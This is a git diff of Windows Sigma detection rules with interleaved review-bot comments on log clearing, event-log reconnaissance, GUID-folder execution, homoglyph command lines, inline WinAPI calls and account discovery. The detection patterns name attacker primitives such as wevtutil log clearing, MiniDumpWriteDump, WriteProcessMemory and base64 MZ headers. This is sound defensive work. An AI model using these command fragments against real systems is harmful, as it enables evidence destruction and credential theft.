@@ -26,30 +24,33 @@ detection: EventID: 4688 Channel: Security selection_wevtutil: - CommandLine|contains: - - 'clear-log ' - - ' cl ' - - 'set-log ' - - ' sl ' - - 'lfn:' - NewProcessName|endswith: \wevtutil.exe + CommandLine|contains: + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' + - 'lfn:' # change log file location and name + NewProcessName|endswith: \wevtutil.exe selection_other_ps: - CommandLine|contains: + CommandLine|contains: - 'Clear-EventLog ' - 'Remove-EventLog ' - 'Limit-EventLog ' - 'Clear-WinEvent ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_other_wmi: - CommandLine|contains: ClearEventLog - NewProcessName|endswith: + CommandLine|contains: ClearEventLog + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \wmic.exe filter_msiexec: - CommandLine|contains: ' sl ' + # Example seen during office update/installation: + # ParentImage: C:\Windows\SysWOW64\msiexec.exe + # CommandLine: "C:\WINDOWS\system32\wevtutil.exe" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false + CommandLine|contains: ' sl ' ParentProcessName: - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\System32\msiexec.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml index cb198b6a3..ec73e6272 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml 
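Review bot: The new inline comment on the `'set-log '` entry in selection_wevtutil has a typo and should read `# modifies config of the specified log. Could be used to set it to a tiny size`. The example added above filter_msiexec documents one specific command (`sl Microsoft-RMS-MSIPC/Debug ...`), but the filter itself still excludes every `' sl '` command line whose parent is msiexec, so a `set-log` run against any other channel under an msiexec parent is suppressed as well; tightening it to `CommandLine|contains|all: [' sl ', 'Microsoft-RMS-MSIPC']` keeps the exclusion as narrow as the documented case. The rule's condition line is outside the hunk, so whether this filter applies to all selections or only to selection_wevtutil is not visible here.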
@@ -1,16 +1,12 @@ title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf related: - - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f - type: derived + - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f + type: derived status: experimental -description: 'Detects execution of different log query utilities and commands to search - and dump the content of specific event logs or look for specific event IDs. - - This technique is used by threat actors in order to extract sensitive information - from events logs such as usernames, IP addresses, hostnames, etc. - - ' +description: | + Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. + This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ 
@@ -36,46 +32,52 @@ detection: EventID: 4688 Channel: Security selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' selection_logs_name: - CommandLine|contains: + CommandLine|contains: + # Note: Add more event log channels that are interesting for attackers - Microsoft-Windows-TerminalServices-LocalSessionManager/Operational - Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational - Security selection_logs_eid: - CommandLine|contains: + CommandLine|contains: + # Note: We use the "?" to account for both a single and a double quote + # Note: Please add additional interesting event IDs + # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers. + # This covers EID 4624 from Security Log - -InstanceId 4624 - System[EventID=4624] - EventCode=?4624? - EventIdentifier=?4624? + # This covers EID 4778 from Security Log - -InstanceId 4778 - System[EventID=4778] - EventCode=?4778? - EventIdentifier=?4778? + # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log - -InstanceId 25 - System[EventID=25] - EventCode=?25? - EventIdentifier=?25? 
- condition: process_creation and (1 of selection_logs_* and (selection_wmi or all - of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) + condition: process_creation and (1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) falsepositives: - Legitimate usage of the utility by administrators to query the event log level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml index be13cd89b..d4dc13b98 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml @@ -1,8 +1,7 @@ title: Suspicious Execution From GUID Like Folder Names id: 90b63c33-2b97-4631-a011-ceb0f47b77c3 status: test -description: Detects potential suspicious execution of a GUID like folder name located - in a suspicious location such as %TEMP% as seen being used in IcedID attacks +description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks references: - https://twitter.com/Kostastsale/status/1565257924204986369 author: Nasreddine Bencherchali (Nextron Systems) 
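Review bot: The new comment `# Note: We use the "?" to account for both a single and a double quote` on selection_logs_eid describes Sigma's `?` more narrowly than it behaves: `?` is a single-character wildcard, so `EventCode=?4624?` also matches a space or any other single character around the ID, not only quote marks. Rewording it to `# Note: "?" is a single-character wildcard, used here so that both single and double quotes around the ID match` keeps the intent without implying the match is quote-specific. The same applies to the `EventIdentifier=?…?` entries in each of the three EID groups. The `-InstanceId 25` value has no terminator, so it substring-matches any ID beginning with 25, whereas the `System[EventID=25]` form does not; that difference may be worth stating in the `# This covers EID 25` comment.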
@@ -15,28 +14,32 @@ logsource: category: process_creation product: windows detection: + # Uncomment this section and remove the filter if you want the rule to be more specific to processes + # selection_img: + # Image|endswith: + # - '\rundll32.exe' process_creation: EventID: 4688 Channel: Security selection_folder: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious or unexpected paths - \AppData\Roaming\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # This could generate some FP with some installers creating folders with GUID selection_guid: - CommandLine|contains|all: + CommandLine|contains|all: - \{ - '}\' filter: - NewProcessName|contains|all: + NewProcessName|contains|all: - \{ - '}\' filter_null: - NewProcessName: null - filter_driver_inst: - NewProcessName: C:\Windows\System32\drvinst.exe + NewProcessName: + filter_driver_inst: # DrvInst.exe "4" "0" "C:\Users\venom\AppData\Local\Temp\{a0753cc2-fcea-4d49-a787-2290b564b06f}\nvvhci.inf" "9" "43a2fa8e7" "00000000000001C0" "WinSta0\Default" "00000000000001C4" "208" "c:\program files\nvidia corporation\installer2\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}" + NewProcessName: C:\Windows\System32\drvinst.exe condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - - Installers are sometimes known for creating temporary folders with GUID like - names. Add appropriate filters accordingly + - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml index c30a29d94..29e272d7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml 
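Review bot: The commented-out `selection_img` template added at the top of detection uses `Image|endswith`, the Sysmon field name, while every other selector in this builtin-channel rule matches on `NewProcessName` (filter, filter_null, filter_driver_inst); anyone uncommenting it as written gets a selection that never matches a 4688 event. Changing the template to `#     NewProcessName|endswith:` keeps it usable for this log source. `filter_null: NewProcessName:` with an empty value parses as YAML null, so behaviour is unchanged from the previous explicit `null`, but the bare key reads like an unfinished line; a trailing `# null` comment would make the intent visible. The single-line example appended to `filter_driver_inst:` is long enough that it would read better as its own `#` comment line above the key.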
+++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml @@ -1,8 +1,7 @@ title: Parent in Public Folder Suspicious Process id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a status: test -description: This rule detects suspicious processes with parent images located in - the C:\Users\Public folder +description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - powershell - 'cmd.exe /c ' - 'cmd.exe /r ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml index 412ac8e35..8433396ec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml 
@@ -21,31 +21,31 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - \$Recycle.bin\ - - \config\systemprofile\ - - \Intel\Logs\ - - \RSA\MachineKeys\ - - \Users\All Users\ - - \Users\Default\ - - \Users\NetworkService\ - - \Users\Public\ - - \Windows\addins\ - - \Windows\debug\ - - \Windows\Fonts\ - - \Windows\Help\ - - \Windows\IME\ - - \Windows\Media\ - - \Windows\repair\ - - \Windows\security\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - NewProcessName|startswith: C:\Perflogs\ + - NewProcessName|contains: + - \$Recycle.bin\ + - \config\systemprofile\ + - \Intel\Logs\ + - \RSA\MachineKeys\ + - \Users\All Users\ + - \Users\Default\ + - \Users\NetworkService\ + - \Users\Public\ + - \Windows\addins\ + - \Windows\debug\ + - \Windows\Fonts\ + - \Windows\Help\ + - \Windows\IME\ + - \Windows\Media\ + - \Windows\repair\ + - \Windows\security\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - NewProcessName|startswith: C:\Perflogs\ filter_ibm: - NewProcessName|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ + NewProcessName|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ filter_citrix: - NewProcessName|startswith: C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\ - NewProcessName|endswith: \CitrixReceiverUpdater.exe + NewProcessName|startswith: C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\ + NewProcessName|endswith: \CitrixReceiverUpdater.exe condition: process_creation and (selection and not 1 of filter_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml index a3ac56bbd..aa6112192 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml 
@@ -1,8 +1,7 @@ title: Execution in Webserver Root Folder id: 35efb964-e6a5-47ad-bbcd-19661854018d status: test -description: Detects a suspicious program execution in a web service root folder (filter - out false positives) +description: Detects a suspicious program execution in a web service root folder (filter out false positives) author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2021/11/27 @@ -17,12 +16,12 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \wwwroot\ - \wmpub\ - \htdocs\ filter: - NewProcessName|contains: + NewProcessName|contains: - bin\ - \Tools\ - \SMSComponent\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml index dabc3ed7b..ee726a592 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml 
@@ -1,13 +1,12 @@ title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS id: 07aa184a-870d-413d-893a-157f317f6f58 related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government @@ -26,9 +25,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs filter: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \wscript.exe condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml index 0978cb883..1b1a35402 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml 
@@ -1,14 +1,11 @@ title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI id: 0900463c-b33b-49a8-be1d-552a3b553dae related: - - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 - type: similar + - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 + type: similar status: experimental -description: 'Detects command line containing reference to the "::$index_allocation" - stream, which can be used as a technique to prevent access to folders or files - from tooling such as "explorer.exe" or "powershell.exe" - - ' +description: | + Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" references: - https://twitter.com/pfiatde/status/1681977680688738305 - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ @@ -28,7 +25,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ::$index_allocation + # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage + CommandLine|contains: ::$index_allocation condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml b/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml index 61b7387b0..f834603c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml 
@@ -1,9 +1,7 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 status: test -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ - location. This folder doesn't require admin privillege to be written and executed - from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ author: Sreeman @@ -22,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - echo - copy - type - file createnew - cacls selection_2: - CommandLine|contains: C:\Windows\Fonts\ + CommandLine|contains: C:\Windows\Fonts\ selection_3: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml b/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml index e351d4848..1a2605be0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml 
@@ -1,16 +1,10 @@ title: Potential Homoglyph Attack Using Lookalike Characters id: 32e280f1-8ad4-46ef-9e80-910657611fbc status: experimental -description: 'Detects the presence of unicode characters which are homoglyphs, or - identical in appearance, to ASCII letter characters. - - This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs - are included; these are characters that - - are indistinguishable from ASCII characters and thus may make excellent candidates - for homoglyph attack characters. - - ' +description: | + Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. + This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that + are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. references: - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish - http://www.irongeek.com/homoglyph-attack-generator.php @@ -20,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1036 - attack.t1036.003 + # - attack.t1036.008 logsource: category: process_creation product: windows 
@@ -28,60 +23,59 @@ detection: EventID: 4688 Channel: Security selection_upper: - CommandLine|contains: - - "\u0410" - - "\u0412" - - "\u0415" - - "\u041A" - - "\u041C" - - "\u041D" - - "\u041E" - - "\u0420" - - "\u0421" - - "\u0422" - - "\u0425" - - "\u0405" - - "\u0406" - - "\u0408" - - "\u04AE" - - "\u04C0" - - "\u050C" - - "\u051A" - - "\u051C" - - "\u0391" - - "\u0392" - - "\u0395" - - "\u0396" - - "\u0397" - - "\u0399" - - "\u039A" - - "\u039C" - - "\u039D" - - "\u039F" - - "\u03A1" - - "\u03A4" - - "\u03A5" - - "\u03A7" + CommandLine|contains: + - А # А/A + - В # В/B + - Е # Е/E + - К # К/K + - М # М/M + - Н # Н/H + - О # О/O + - Р # Р/P + - С # С/C + - Т # Т/T + - Х # Х/X + - Ѕ # Ѕ/S + - І # І/I + - Ј # Ј/J + - Ү # Ү/Y + - Ӏ # Ӏ/I + - Ԍ # Ԍ/G + - Ԛ # Ԛ/Q + - Ԝ # Ԝ/W + - Α # Α/A + - Β # Β/B + - Ε # Ε/E + - Ζ # Ζ/Z + - Η # Η/H + - Ι # Ι/I + - Κ # Κ/K + - Μ # Μ/M + - Ν # Ν/N + - Ο # Ο/O + - Ρ # Ρ/P + - Τ # Τ/T + - Υ # Υ/Y + - Χ # Χ/X selection_lower: - CommandLine|contains: - - "\u0430" - - "\u0435" - - "\u043E" - - "\u0440" - - "\u0441" - - "\u0445" - - "\u0455" - - "\u0456" - - "\u04CF" - - "\u0458" - - "\u04BB" - - "\u0501" - - "\u051B" - - "\u051D" - - "\u03BF" + CommandLine|contains: + - а # а/a + - е # е/e + - о # о/o + - р # р/p + - с # с/c + - х # х/x + - ѕ # ѕ/s + - і # і/i + - ӏ # ӏ/l + - ј # ј/j + - һ # һ/h + - ԁ # ԁ/d + - ԛ # ԛ/q + - ԝ # ԝ/w + - ο # ο/o condition: process_creation and (1 of selection_*) falsepositives: - - Commandlines with legitimate Cyrillic text; will likely require tuning (or not - be usable) in countries where these alphabets are in use. + - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml index ffa3bebb7..2394eb851 100644 
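Review bot: Replacing the `"\uXXXX"` escapes with literal Cyrillic and Greek characters makes the values visually indistinguishable from their ASCII lookalikes in most editors, and the trailing `# А/A` comments repeat the same two glyphs, so a reviewer cannot confirm by eye which code point is actually in the value; a silent normalisation or encoding mix-up on save would go unnoticed. Keeping the code point in the comment, e.g. `- А # U+0410 Cyrillic A vs Latin A`, preserves the reviewability the escapes gave. This applies to every entry in selection_upper and selection_lower. The file must also stay UTF-8 on disk for these values to survive, which the escaped form did not depend on.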
--- a/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml @@ -1,9 +1,7 @@ title: Execution Of Non-Existing File id: 71158e3f-df67-472b-930e-7d287acaa3e1 status: test -description: Checks whether the image specified in a process creation event is not - a full, absolute path (caused by process ghosting or other unorthodox methods - to start a process) +description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -19,23 +17,23 @@ detection: EventID: 4688 Channel: Security image_absolute_path: - NewProcessName|contains: \ + NewProcessName|contains: \ filter_null: - NewProcessName: null + NewProcessName: filter_empty: - NewProcessName: + NewProcessName: - '-' - '' filter_4688: - - NewProcessName: - - System - - Registry - - MemCompression - - vmmem - - CommandLine: - - Registry - - MemCompression - - vmmem + - NewProcessName: + - System + - Registry + - MemCompression + - vmmem + - CommandLine: + - Registry + - MemCompression + - vmmem condition: process_creation and (not image_absolute_path and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml b/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml index c38eeb2f5..f8d5112d9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml 
@@ -16,8 +16,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - TVqQAAMAAAAEAAAA + CommandLine|contains: + - TVqQAAMAAAAEAAAA # MZ.......... - TVpQAAIAAAAEAA8A - TVqAAAEAAAAEABAA - TVoAAAAAAAAAAAAA diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml b/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml index ed9f08913..074463b70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml @@ -1,11 +1,10 @@ title: Potential WinAPI Calls Via CommandLine id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 related: - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: derived + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: derived status: test -description: Detects the use of WinAPI Functions via the commandline. As seen used - by threat actors via the tool winapiexec +description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - AddSecurityPackage - AdjustTokenPrivileges - Advapi32 @@ -48,6 +47,7 @@ detection: - LoadLibrary - memcpy - MiniDumpWriteDump + # - 'msvcrt' - ntdll - OpenDesktop - OpenProcess @@ -61,6 +61,7 @@ detection: - RtlCreateUserThread - secur32 - SetThreadToken + # - 'user32' - VirtualAlloc - VirtualFree - VirtualProtect 
@@ -69,8 +70,8 @@ detection: - WriteProcessMemory - ZeroFreeGlobalAllocUnicode filter_optional_mpcmdrun: - CommandLine|contains: GetLoadLibraryWAddress32 - NewProcessName|endswith: \MpCmdRun.exe + CommandLine|contains: GetLoadLibraryWAddress32 + NewProcessName|endswith: \MpCmdRun.exe condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml index c67871909..fe4cbaf1e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml 
@@ -19,44 +19,43 @@ detection: EventID: 4688 Channel: Security selection_other_img: - NewProcessName|endswith: + NewProcessName|endswith: - \whoami.exe - \quser.exe - \qwinsta.exe selection_other_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - useraccount - get - NewProcessName|endswith: \wmic.exe + NewProcessName|endswith: \wmic.exe selection_other_cmdkey: - CommandLine|contains: ' /l' - NewProcessName|endswith: \cmdkey.exe + CommandLine|contains: ' /l' + NewProcessName|endswith: \cmdkey.exe selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c' - 'dir ' - \Users\ - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_cmd: - CommandLine|contains: ' rmdir ' + CommandLine|contains: ' rmdir ' # don't match on 'dir' "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005" selection_net: - CommandLine|contains: user - NewProcessName|endswith: + CommandLine|contains: user + NewProcessName|endswith: - \net.exe - \net1.exe filter_net: - CommandLine|contains: - - /domain - - /add - - /delete - - /active - - /expires - - /passwordreq - - /scriptpath - - /times - - /workstations - condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net - and not filter_net) or 1 of selection_other_*) + CommandLine|contains: + - /domain # local account discovery only + - /add # discovery only + - /delete # discovery only + - /active # discovery only + - /expires # discovery only + - /passwordreq # discovery only + - /scriptpath # discovery only + - /times # discovery only + - /workstations # discovery only + condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*) falsepositives: - Legitimate administrator or user enumerates local users for legitimate reason level: low 
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml b/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml index a4639664a..9114f8e85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml @@ -1,17 +1,15 @@ title: LOLBIN Execution From Abnormal Drive id: d4ca7c59-e9e4-42d8-bf57-91a776efcb87 related: - - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 - type: similar + - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 + type: similar status: test -description: Detects LOLBINs executing from an abnormal or uncommon drive such as - a mounted ISO. +description: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ - https://www.scythe.io/library/threat-emulation-qakbot - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - - SEC Consult '@angelo_violetti', Aaron Herman +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman date: 2022/01/25 modified: 2023/08/29 tags: 
@@ -24,32 +22,33 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \calc.exe - - \certutil.exe - - \cmstp.exe - - \cscript.exe - - \installutil.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - CALC.EXE - - CertUtil.exe - - CMSTP.EXE - - cscript.exe - - installutil.exe - - MSHTA.EXE - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + # Note: add more lolbins for additional coverage + - NewProcessName|endswith: + - \calc.exe + - \certutil.exe + - \cmstp.exe + - \cscript.exe + - \installutil.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - CALC.EXE + - CertUtil.exe + - CMSTP.EXE + - cscript.exe + - installutil.exe + - MSHTA.EXE + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_currentdirectory: CurrentDirectory|contains: C:\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Rare false positives could occur on servers with multiple drives. diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml b/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml index a0a8abb8a..92e8611bc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml 
